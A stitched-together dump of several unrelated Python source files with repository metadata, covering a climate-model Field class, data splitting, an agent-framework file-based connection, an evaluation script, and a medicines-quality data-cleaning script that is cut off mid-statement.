>>> insolation.shape
(3, 4, 1)
>>> insolation
Field([[[ 237.], [[ 417.], [[ 237.],
[ 237.], [ 417.], [ 237.],
[ 237.], [ 417.], [ 237.],
[ 237.]], [ 417.]], [ 237.]]])
"""
# if array is latitude dependent (has the same shape as lat)
axis, array, depth = np.meshgrid(domain.axes[axis].points, array,
domain.axes['depth'].points)
if axis == 'lat':
# if array is longitude dependent (has the same shape as lon)
np.swapaxes(array,1,0)
return Field(array, domain=domain)
| 38.01773 | 86 | 0.566179 | # Trying a new data model for state variables and domains:
# Create a new sub-class of numpy.ndarray
# that has as an attribute the domain itself
# Following a tutorial on subclassing ndarray here:
#
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html
from __future__ import division
import numpy as np
from climlab.domain.xarray import Field_to_xarray
class Field(np.ndarray):
"""Custom class for climlab gridded quantities, called Field.
This class behaves exactly like :py:class:`numpy.ndarray`
but every object has an attribute called ``self.domain``
which is the domain associated with that field (e.g. state variables).
**Initialization parameters** \n
An instance of ``Field`` is initialized with the following
arguments:
:param array input_array: the array which the Field object should be
initialized with
:param domain: the domain associated with that field
(e.g. state variables)
:type domain: :class:`~climlab.domain.domain._Domain`
**Object attributes** \n
Following object attribute is generated during initialization:
:var domain: the domain associated with that field
(e.g. state variables)
:vartype domain: :class:`~climlab.domain.domain._Domain`
:Example:
::
>>> import climlab
>>> import numpy as np
>>> from climlab import domain
>>> from climlab.domain import field
>>> # distribution of state
>>> distr = np.linspace(0., 10., 30)
>>> # domain creation
>>> sfc, atm = domain.single_column()
>>> # build state of type Field
>>> s = field.Field(distr, domain=atm)
>>> print s
[ 0. 0.34482759 0.68965517 1.03448276 1.37931034
1.72413793 2.06896552 2.4137931 2.75862069 3.10344828
3.44827586 3.79310345 4.13793103 4.48275862 4.82758621
5.17241379 5.51724138 5.86206897 6.20689655 6.55172414
6.89655172 7.24137931 7.5862069 7.93103448 8.27586207
8.62068966 8.96551724 9.31034483 9.65517241 10. ]
>>> print s.domain
climlab Domain object with domain_type=atm and shape=(30,)
>>> # can slice this and it preserves the domain
>>> # a more full-featured implementation would have intelligent
>>> # slicing like in iris
>>> s.shape == s.domain.shape
True
>>> s[:1].shape == s[:1].domain.shape
False
>>> # But some things work very well. E.g. new field creation:
>>> s2 = np.zeros_like(s)
>>> print s2
[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.
0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
>>> print s2.domain
climlab Domain object with domain_type=atm and shape=(30,)
"""
def __new__(cls, input_array, domain=None, interfaces=False):
# Input array is an already formed ndarray instance
# We first cast to be our class type
#obj = np.asarray(input_array).view(cls)
# This should ensure that shape is (1,) for scalar input
#obj = np.atleast_1d(input_array).view(cls)
# add the new attribute to the created instance
# do some checking for correct dimensions
# input argument interfaces indicates whether input_array exists
# on cell interfaces for each dimensions
# It should be either a single Boolean
# or an array of Booleans compatible with number of dimensions
if input_array is None:
return None
else:
try:
shape = np.array(domain.shape) + np.where(interfaces,1,0)
except:
raise ValueError('domain and interfaces inconsistent.')
try:
#assert obj.shape == domain.shape
# This will work if input_array is any of:
# - scalar
# - same shape as domain
# - broadcast-compatible with domain shape
obj = (input_array * np.ones(shape)).view(cls)
assert np.all(obj.shape == shape)
except:
try:
# Do we get a match if we add a singleton dimension
# (e.g. a singleton depth axis)?
obj = np.expand_dims(input_array, axis=-1).view(cls)
assert np.all(obj.shape == shape)
#obj = np.transpose(np.atleast_2d(obj))
#if obj.shape == domain.shape:
# obj.domain = domain
except:
raise ValueError('Cannot reconcile shapes of input_array and domain.')
obj.domain = domain
obj.interfaces = interfaces
# would be nice to have some automatic domain creation here if none given
# Finally, we must return the newly created object:
return obj
def __array_finalize__(self, obj):
# ``self`` is a new object resulting from
# ndarray.__new__(Field, ...), therefore it only has
# attributes that the ndarray.__new__ constructor gave it -
# i.e. those of a standard ndarray.
#
# We could have got to the ndarray.__new__ call in 3 ways:
# From an explicit constructor - e.g. Field():
# obj is None
# (we're in the middle of the Field.__new__
# constructor, and self.domain will be set when we return to
# Field.__new__)
if obj is None: return
# From view casting - e.g arr.view(Field):
# obj is arr
# (type(obj) can be Field)
# From new-from-template - e.g statearr[:3]
# type(obj) is Field
#
# Note that it is here, rather than in the __new__ method,
# that we set the default value for 'domain', because this
# method sees all creation of default objects - with the
# Field.__new__ constructor, but also with
# arr.view(Field).
try:
self.domain = obj.domain
except:
self.domain = None
try:
self.interfaces = obj.interfaces
except:
pass
# We do not need to return anything
## Loosely based on the approach in numpy.ma.core.MaskedArray
# This determines how we slice a Field object
def __getitem__(self, indx):
"""
x.__getitem__(y) <==> x[y]
Return the item described by i, as a Field.
"""
# create a view of just the data as np.ndarray and slice it
dout = self.view(np.ndarray)[indx]
try:
#Force dout to type Field
dout = dout.view(type(self))
# Now slice the domain
dout.domain = self.domain[indx]
# Inherit attributes from self
if hasattr(self, 'interfaces'):
dout.interfaces = self.interfaces
except:
# The above will fail if we extract a single item
# in which case we should just return the item
pass
return dout
def to_xarray(self):
"""Convert Field object to xarray.DataArray"""
return Field_to_xarray(self)
def global_mean(field):
"""Calculates the latitude weighted global mean of a field
with latitude dependence.
:param Field field: input field
:raises: :exc:`ValueError` if input field has no latitude axis
:return: latitude weighted global mean of the field
:rtype: float
:Example:
initial global mean temperature of EBM model::
>>> import climlab
>>> model = climlab.EBM()
>>> climlab.global_mean(model.Ts)
Field(11.997968598413685)
"""
try:
lat = field.domain.lat.points
except:
raise ValueError('No latitude axis in input field.')
try:
# Field is 2D latitude / longitude
lon = field.domain.lon.points
return _global_mean_latlon(field.squeeze())
except:
# Field is 1D latitude only (zonal average)
lat_radians = np.deg2rad(lat)
return _global_mean(field.squeeze(), lat_radians)
def _global_mean(array, lat_radians):
# Use np.array() here to strip the Field data and return a plain array
# (This will be more graceful once we are using xarray.DataArray
# for all internal grid info instead of the Field object)
return np.array(np.average(array, weights=np.cos(lat_radians)))
def _global_mean_latlon(field):
dom = field.domain
lon, lat = np.meshgrid(dom.lon.points, dom.lat.points)
dy = np.deg2rad(np.diff(dom.lat.bounds))
dx = np.deg2rad(np.diff(dom.lon.bounds))*np.cos(np.deg2rad(lat))
area = dx * dy[:,np.newaxis] # grid cell area in radians^2
return np.array(np.average(field, weights=area))
def to_latlon(array, domain, axis = 'lon'):
"""Broadcasts a 1D axis dependent array across another axis.
:param array input_array: the 1D array used for broadcasting
:param domain: the domain associated with that
array
:param axis: the axis that the input array will
be broadcasted across
[default: 'lon']
:return: Field with the same shape as the
domain
:Example:
::
>>> import climlab
>>> from climlab.domain.field import to_latlon
>>> import numpy as np
>>> state = climlab.surface_state(num_lat=3, num_lon=4)
>>> m = climlab.EBM_annual(state=state)
>>> insolation = np.array([237., 417., 237.])
>>> insolation = to_latlon(insolation, domain = m.domains['Ts'])
>>> insolation.shape
(3, 4, 1)
>>> insolation
Field([[[ 237.], [[ 417.], [[ 237.],
[ 237.], [ 417.], [ 237.],
[ 237.], [ 417.], [ 237.],
[ 237.]], [ 417.]], [ 237.]]])
"""
# if array is latitude dependent (has the same shape as lat)
axis, array, depth = np.meshgrid(domain.axes[axis].points, array,
domain.axes['depth'].points)
if axis == 'lat':
# if array is longitude dependent (has the same shape as lon)
np.swapaxes(array,1,0)
return Field(array, domain=domain)
| 3,914 | 0 | 99 |
1c219888920e1a8bc93025db5532422bfc527d70 | 543 | py | Python | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | splitData.py | csortu/drugMLPytorch | 7ea6ef8c46dc3027a7ebd21836b7b12c23659db8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 13:32:14 2019
@author: ortutay
"""
import pandas as pd
import numpy as np
link = 'http://bit.ly/uforeports'
ufo = pd.read_csv(link)
# We split 60-20-20% tran-validation-test sets
train, validate, test = np.split(ufo.sample(frac=1),
[int(.6*len(ufo)),int(.8*len(ufo))])
a = pd.DataFrame({'col1': np.arange(1, 21),'col2': np.arange(21,41)})
train, validate, test = np.split(a.sample(frac=1), [int(.8 * len(a)), int(.9 * len(a))]) | 23.608696 | 88 | 0.598527 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 13:32:14 2019
@author: ortutay
"""
import pandas as pd
import numpy as np
link = 'http://bit.ly/uforeports'
ufo = pd.read_csv(link)
# We split 60-20-20% tran-validation-test sets
train, validate, test = np.split(ufo.sample(frac=1),
[int(.6*len(ufo)),int(.8*len(ufo))])
a = pd.DataFrame({'col1': np.arange(1, 21),'col2': np.arange(21,41)})
train, validate, test = np.split(a.sample(frac=1), [int(.8 * len(a)), int(.9 * len(a))]) | 0 | 0 | 0 |
db3dbbc1512ecbbd2e1ba563130b86c31b5d740a | 3,867 | py | Python | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/connections/p2p_stub/connection.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the p2p stub connection."""
import os
import tempfile
from pathlib import Path
from typing import Any, Union, cast
from aea.configurations.base import ConnectionConfig, PublicId
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection, write_envelope
PUBLIC_ID = PublicId.from_str("fetchai/p2p_stub:0.16.0")
class P2PStubConnection(StubConnection):
r"""A p2p stub connection.
This connection uses an existing directory as a Rendez-Vous point for agents to communicate locally.
Each connected agent will create a file named after its address/identity where it can receive messages.
The connection detects new messages by watchdogging the input file looking for new lines.
"""
connection_id = PUBLIC_ID
def __init__(
self, configuration: ConnectionConfig, identity: Identity, **kwargs: Any
) -> None:
"""
Initialize a p2p stub connection.
:param configuration: the connection configuration
:param identity: the identity
"""
namespace_dir_path = cast(
Union[str, Path],
configuration.config.get("namespace_dir", tempfile.mkdtemp()),
)
if namespace_dir_path is None:
raise ValueError("namespace_dir_path must be set!") # pragma: nocover
self.namespace = os.path.abspath(namespace_dir_path)
input_file_path = os.path.join(self.namespace, "{}.in".format(identity.address))
output_file_path = os.path.join(
self.namespace, "{}.out".format(identity.address)
)
configuration.config["input_file"] = input_file_path
configuration.config["output_file"] = output_file_path
super().__init__(configuration=configuration, identity=identity, **kwargs)
async def send(self, envelope: Envelope) -> None:
"""
Send messages.
:return: None
"""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
self._ensure_valid_envelope_for_external_comms(envelope)
target_file = Path(os.path.join(self.namespace, "{}.in".format(envelope.to)))
with open(target_file, "ab") as file:
await self.loop.run_in_executor(
self._write_pool, write_envelope, envelope, file
)
async def disconnect(self) -> None:
"""Disconnect the connection."""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
await self.loop.run_in_executor(self._write_pool, self._cleanup)
await super().disconnect()
| 35.805556 | 107 | 0.639514 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the p2p stub connection."""
import os
import tempfile
from pathlib import Path
from typing import Any, Union, cast
from aea.configurations.base import ConnectionConfig, PublicId
from aea.identity.base import Identity
from aea.mail.base import Envelope
from packages.fetchai.connections.stub.connection import StubConnection, write_envelope
PUBLIC_ID = PublicId.from_str("fetchai/p2p_stub:0.16.0")
class P2PStubConnection(StubConnection):
r"""A p2p stub connection.
This connection uses an existing directory as a Rendez-Vous point for agents to communicate locally.
Each connected agent will create a file named after its address/identity where it can receive messages.
The connection detects new messages by watchdogging the input file looking for new lines.
"""
connection_id = PUBLIC_ID
def __init__(
self, configuration: ConnectionConfig, identity: Identity, **kwargs: Any
) -> None:
"""
Initialize a p2p stub connection.
:param configuration: the connection configuration
:param identity: the identity
"""
namespace_dir_path = cast(
Union[str, Path],
configuration.config.get("namespace_dir", tempfile.mkdtemp()),
)
if namespace_dir_path is None:
raise ValueError("namespace_dir_path must be set!") # pragma: nocover
self.namespace = os.path.abspath(namespace_dir_path)
input_file_path = os.path.join(self.namespace, "{}.in".format(identity.address))
output_file_path = os.path.join(
self.namespace, "{}.out".format(identity.address)
)
configuration.config["input_file"] = input_file_path
configuration.config["output_file"] = output_file_path
super().__init__(configuration=configuration, identity=identity, **kwargs)
async def send(self, envelope: Envelope) -> None:
"""
Send messages.
:return: None
"""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
self._ensure_valid_envelope_for_external_comms(envelope)
target_file = Path(os.path.join(self.namespace, "{}.in".format(envelope.to)))
with open(target_file, "ab") as file:
await self.loop.run_in_executor(
self._write_pool, write_envelope, envelope, file
)
async def disconnect(self) -> None:
"""Disconnect the connection."""
if self.loop is None:
raise ValueError("Loop not initialized.") # pragma: nocover
await self.loop.run_in_executor(self._write_pool, self._cleanup)
await super().disconnect()
def _cleanup(self) -> None:
try:
os.unlink(self.configuration.config["input_file"])
except OSError:
pass
try:
os.unlink(self.configuration.config["output_file"])
except OSError:
pass
try:
os.rmdir(self.namespace)
except OSError:
pass
| 332 | 0 | 27 |
45f23f6efe4ea3f63029af086469c8e887e61725 | 276 | py | Python | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | 1 | 2021-08-10T15:00:34.000Z | 2021-08-10T15:00:34.000Z | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | null | null | null | PythonDownload/pythonexercicios/ex035.py | GitGuii/PythonExs | afab77b311d23f7ed88d94e9ce927653cf648b29 | [
"MIT"
] | null | null | null | n1 = float(input('Digite o primeiro numero'))
n2 = float(input('Digite o segundo numero'))
n3 = float(input('Digite o terceiro numero'))
if n1 < (n2 + n3) and n2 < (n1 + n3) and n3 < (n2 + n1):
print('Podem formar um triangulo')
else:
print('Nao formam um triangulo')
| 34.5 | 56 | 0.652174 | n1 = float(input('Digite o primeiro numero'))
n2 = float(input('Digite o segundo numero'))
n3 = float(input('Digite o terceiro numero'))
if n1 < (n2 + n3) and n2 < (n1 + n3) and n3 < (n2 + n1):
print('Podem formar um triangulo')
else:
print('Nao formam um triangulo')
| 0 | 0 | 0 |
95475ab1680a0c52a5af6f1bf727e1a18b73e173 | 1,867 | py | Python | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | 1 | 2021-11-10T07:49:13.000Z | 2021-11-10T07:49:13.000Z | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | null | null | null | eval_adynorm.py | bestasoff/adynorm | e43488db2b49b4025faa280404bc44f6103c326d | [
"MIT"
] | 1 | 2021-11-10T16:09:36.000Z | 2021-11-10T16:09:36.000Z | import argparse
import logging
from transformers import (
set_seed,
)
from adynorm.eval_utils import (
evaluate
)
from adynorm.adynorm import Adynorm, AdynormNet
from adynorm.datasets import ConceptDataset, DictDataset
logger = logging.getLogger(__name__)
if __name__ == "__main__":
main()
| 24.893333 | 105 | 0.680771 | import argparse
import logging
from transformers import (
set_seed,
)
from adynorm.eval_utils import (
evaluate
)
from adynorm.adynorm import Adynorm, AdynormNet
from adynorm.datasets import ConceptDataset, DictDataset
logger = logging.getLogger(__name__)
def parse_args():
parser = argparse.ArgumentParser(description='Arguments for entity classifier training.')
parser.add_argument('--processed_val_path', required=True)
parser.add_argument('--val_dict_path', required=True)
parser.add_argument('--max_length', type=int, default=25)
parser.add_argument('--k', type=int, default=10)
parser.add_argument('--model_name_or_path', type=str, default='dmis-lab/biobert-base-cased-v1.1')
parser.add_argument('--seed', type=int, default=42)
args = parser.parse_args()
return args
def main():
args = parse_args()
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info("Training/evaluation parameters %s", args)
set_seed(args.seed)
device = 'cpu'
val_dictionary = DictDataset(args.val_dict_path).data
val_concept_dataset = ConceptDataset(
data_path=args.processed_val_path,
filter_duplicates=True,
filter_without_cui=True,
filter_composite_names=True
).data
adynorm = Adynorm(
max_length=args.max_length,
device=device
)
adynorm.load(args.model_name_or_path, args.model_name_or_path)
model = AdynormNet(encoder=adynorm.get_encoder()).to(device)
result = evaluate(adynorm, model.to('cpu'), val_dictionary, val_concept_dataset, 35, args.max_length)
for k in result.keys():
if k == 'preds':
continue
print(k, result[k])
if __name__ == "__main__":
main()
| 1,511 | 0 | 46 |
8347d76b22e0fced38a256902b83cd52fdf4bc5f | 786 | py | Python | tests/product/cluster_types.py | leniartek/trino-admin | 05104a0b35bbc4aeca9469b2fc63a21c814a7855 | [
"Apache-2.0"
] | 34 | 2016-01-08T21:02:13.000Z | 2017-03-10T02:01:03.000Z | tests/product/cluster_types.py | starburstdata/presto-admin | 1bb652debefe1e26e9105f8ffb08a8793790967a | [
"Apache-2.0"
] | 19 | 2019-05-16T13:09:25.000Z | 2020-12-04T18:01:39.000Z | tests/product/cluster_types.py | starburstdata/presto-admin | 1bb652debefe1e26e9105f8ffb08a8793790967a | [
"Apache-2.0"
] | 15 | 2019-03-07T16:37:06.000Z | 2020-11-12T12:07:46.000Z | from tests.product.mode_installers import StandaloneModeInstaller
from tests.product.prestoadmin_installer import PrestoadminInstaller
from tests.product.topology_installer import TopologyInstaller
from tests.product.standalone.presto_installer import StandalonePrestoInstaller
STANDALONE_BARE_CLUSTER = 'bare'
BARE_CLUSTER = 'bare'
STANDALONE_PA_CLUSTER = 'pa_only_standalone'
STANDALONE_PRESTO_CLUSTER = 'presto'
cluster_types = {
BARE_CLUSTER: [],
STANDALONE_PA_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller],
STANDALONE_PRESTO_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller,
TopologyInstaller,
StandalonePrestoInstaller],
}
| 37.428571 | 79 | 0.71883 | from tests.product.mode_installers import StandaloneModeInstaller
from tests.product.prestoadmin_installer import PrestoadminInstaller
from tests.product.topology_installer import TopologyInstaller
from tests.product.standalone.presto_installer import StandalonePrestoInstaller
STANDALONE_BARE_CLUSTER = 'bare'
BARE_CLUSTER = 'bare'
STANDALONE_PA_CLUSTER = 'pa_only_standalone'
STANDALONE_PRESTO_CLUSTER = 'presto'
cluster_types = {
BARE_CLUSTER: [],
STANDALONE_PA_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller],
STANDALONE_PRESTO_CLUSTER: [PrestoadminInstaller,
StandaloneModeInstaller,
TopologyInstaller,
StandalonePrestoInstaller],
}
| 0 | 0 | 0 |
403675c7346f6a144ac3a6672c5e4b6d9556a72c | 61,411 | py | Python | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | scratchfiles/MQDscript.py | eugenewickett/logistigateanalysis | 5174f40db5f79bfd12491850cef53edde825b71b | [
"MIT"
] | null | null | null | # Workaround for the 'methods' file not being able to locate the 'mcmcsamplers' folder for importing
import sys
import os
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate')))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate', 'mcmcsamplers')))
import logistigate.logistigate.utilities as util # Pull from the submodule "develop" branch
import logistigate.logistigate.methods as methods # Pull from the submodule "develop" branch
import logistigate.logistigate.lg as lg # Pull from the submodule "develop" branch
def cleanMQD():
'''
Script that cleans up raw Medicines Quality Database data for use in logistigate.
It reads in a CSV file with columns 'Country,' 'Province,' 'Therapeutic Indication',
'Manufacturer,' 'Facility Type', 'Date Sample Collected', 'Final Test Result,' and
'Type of Test', and returns a dictionary of objects to be formatted for use with logistigate.
'''
# Read in the raw database file
import pandas as pd
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
filesPath = os.path.join(SCRIPT_DIR, '../MQDfiles')
MQD_df = pd.read_csv(os.path.join(filesPath,'MQD_ALL_CSV.csv')) # Main raw database file
# Get data particular to each country of interest
MQD_df_CAM = MQD_df[MQD_df['Country'] == 'Cambodia'].copy()
MQD_df_GHA = MQD_df[MQD_df['Country'] == 'Ghana'].copy()
MQD_df_PHI = MQD_df[MQD_df['Country'] == 'Philippines'].copy()
# Consolidate typos or seemingly identical entries in significant categories
# Cambodia
# Province
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Ratanakiri') | (MQD_df_CAM.Province == 'Rattanakiri'), 'Province'] = 'Ratanakiri'
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Steung Treng') | (MQD_df_CAM.Province == 'Stung Treng'), 'Province'] = 'Stung Treng'
# Manufacturer
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Acdhon Co., Ltd') | (MQD_df_CAM.Manufacturer == 'Acdhon Company Ltd'),
'Manufacturer'] = 'Acdhon Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Alembic Limited') | (MQD_df_CAM.Manufacturer == 'Alembic Pharmaceuticals Ltd'),
'Manufacturer'] = 'Alembic Limited'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'ALICE PHARMA PVT LTD') | (MQD_df_CAM.Manufacturer == 'Alice Pharma Pvt.Ltd')
| (MQD_df_CAM.Manufacturer == 'Alice Pharmaceuticals'), 'Manufacturer'] = 'Alice Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Atoz Pharmaceutical Pvt.Ltd') | (MQD_df_CAM.Manufacturer == 'Atoz Pharmaceuticals Ltd'),
'Manufacturer'] = 'Atoz Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aurobindo Pharma LTD') | (MQD_df_CAM.Manufacturer == 'Aurobindo Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Aurobindo Pharmaceuticals Ltd'), 'Manufacturer'] = 'Aurobindo'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aventis') | (MQD_df_CAM.Manufacturer == 'Aventis Pharma Specialite'),
'Manufacturer'] = 'Aventis'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Bright Future Laboratories') | (MQD_df_CAM.Manufacturer == 'Bright Future Pharma'),
'Manufacturer'] = 'Bright Future Laboratories'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Burapha') | (MQD_df_CAM.Manufacturer == 'Burapha Dispensary Co, Ltd'),
'Manufacturer'] = 'Burapha'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'CHANKIT') | (MQD_df_CAM.Manufacturer == 'Chankit Trading Ltd')
| (MQD_df_CAM.Manufacturer == 'Chankit trading Ltd, Part'),
'Manufacturer'] = 'Chankit Trading Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratoire Co., LTD') | (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratories Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratory Company Ltd'),
'Manufacturer'] = 'Chea Chamnan Laboratory Company Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Cipla Ltd.') | (MQD_df_CAM.Manufacturer == 'Cipla Ltd'),
'Manufacturer'] = 'Cipla Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT_stock corp')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMPORT EXPORT JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'Domesco'),
'Manufacturer'] = 'Domesco'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Emcure Pharmaceutical') | (MQD_df_CAM.Manufacturer == 'Emcure'),
'Manufacturer'] = 'Emcure'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Eurolife Healthcare Pvt Ltd') | (MQD_df_CAM.Manufacturer == 'Eurolife'),
'Manufacturer'] = 'Eurolife'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceutical Limited') | (MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceuticals Ltd'),
'Manufacturer'] = 'Flamingo Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Global Pharma Health care PVT-LTD')
| (MQD_df_CAM.Manufacturer == 'GlobalPharma Healthcare Pvt-Ltd')
| (MQD_df_CAM.Manufacturer == 'Global Pharma'),
'Manufacturer'] = 'Global Pharma'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals Ltd.') | (MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals'),
'Manufacturer'] = 'Gracure Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceutical Company Ltd') | (MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceuticals Ltd'),
'Manufacturer'] = 'Il Dong Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Khandelwal Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Khandewal Lab')
| (MQD_df_CAM.Manufacturer == 'Khandelwal'),
'Manufacturer'] = 'Khandelwal'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Laboratories EPHAC Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'EPHAC Laboratories Ltd'),
'Manufacturer'] = 'Laboratories EPHAC Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Lyka Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs Limited.')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs'),
'Manufacturer'] = 'Lyka Labs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Marksans Pharmaceuticals Ltd') | (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.,'),
'Manufacturer'] = 'Marksans Pharma Ltd.'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'MASALAB') | (MQD_df_CAM.Manufacturer == 'Masa Lab Co., Ltd'),
'Manufacturer'] = 'Masa Lab Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enterprise')
| (MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enteprise'),
'Manufacturer'] = 'Medical Supply Pharmaceutical Enterprise'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medopharm Pvt. Ltd.')
| (MQD_df_CAM.Manufacturer == 'Medopharm'),
'Manufacturer'] = 'Medopharm'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Micro Laboratories Ltd') | (MQD_df_CAM.Manufacturer == 'MICRO LAB LIMITED')
| (MQD_df_CAM.Manufacturer == 'Micro Labs Ltd') | (MQD_df_CAM.Manufacturer == 'Microlabs Limited'),
'Manufacturer'] = 'Microlabs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Millimed Co., Ltd Thailand')
| (MQD_df_CAM.Manufacturer == 'Millimed'),
'Manufacturer'] = 'Millimed'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Orchid Health Care') | (MQD_df_CAM.Manufacturer == 'Orchid Health'),
'Manufacturer'] = 'Orchid Health'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratory Co., LTD') | (MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratories'),
'Manufacturer'] = 'Osoth Inter Laboratories'
MQD_df_CAM.loc[
